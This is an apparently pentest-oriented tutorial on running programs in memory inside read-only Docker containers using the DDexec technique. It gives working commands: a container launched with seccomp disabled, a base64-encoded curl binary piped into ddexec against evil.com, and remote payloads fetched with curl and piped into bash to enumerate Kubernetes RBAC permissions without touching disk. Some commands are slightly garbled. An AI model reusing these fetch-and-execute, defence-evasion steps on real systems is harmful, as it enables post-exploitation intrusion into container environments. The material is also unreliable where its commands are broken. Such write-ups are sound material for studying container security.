Bypassing read only filesystem(ro) restriction containers - inmemory execution
Hi reader! I am sure you might have encountered a container while pentesting with read only filesystem and felt stuck as you can’t transfer files/run your custom programs…
Today we will be looking into what we can try if ever got into such container.
Prerequisites(copied from https://github.com/arget13/DDexec)-
- These programs should be available in container image-
bash | zsh | ash (busybox)
setarch | linux64 (busybox)
2. personality() syscall must be allowed, which is blocked in default docker seccomp profile. Therefore we will not use any seccomp profile()
Let’s see the inmemory execution now-
a) Run a test container
We will be using latest ubuntu image with tag: latest from dockerhub
docker run --security-opt seccomp=unconfined --read-only -it ubuntu
b) For example i want to run curl inside container which is not available and we verify we don’t have permission to write any file in container fs.
c) Downloading curl static binary and converting it to b64 string-
wget https://github.com/moparisthebest/static-curl/releases/download/v7.82.0/curl-amd64 && mv curl-amd64 curlbase64 -w0 ./curl > curl.b64
c) Creating a function/method name ddexec (This step can be skipped if curl is present)-
> # Copy and Paste the ddexec.sh script as it is.
d) Running the base64 encoded binary using ddexec-
echo -n "<b64 encoded curl binary>" | ddexec /bin/curl evil.com
Our Dns resolver is not configured that’s why curl was unable to resolve evil.com :)
If curl is already there in the container then we can host the base64 encoded binary file and just run the below command-
curl -sk "http://<>kubectl.b64>" | ddexec /bin/kubectl auth can-i --list
Here we are listing RBAC permissions inmemory w/o touching disk.
Also we can skip creating dexec() method -
curl -sk "http://<IP>:<PORT>/<kubectl.b64>" | bash <(https://raw.githubusercontent.com/arget13/DDexec/main/ddexec.sh) /bin/kubectl auth can-i --list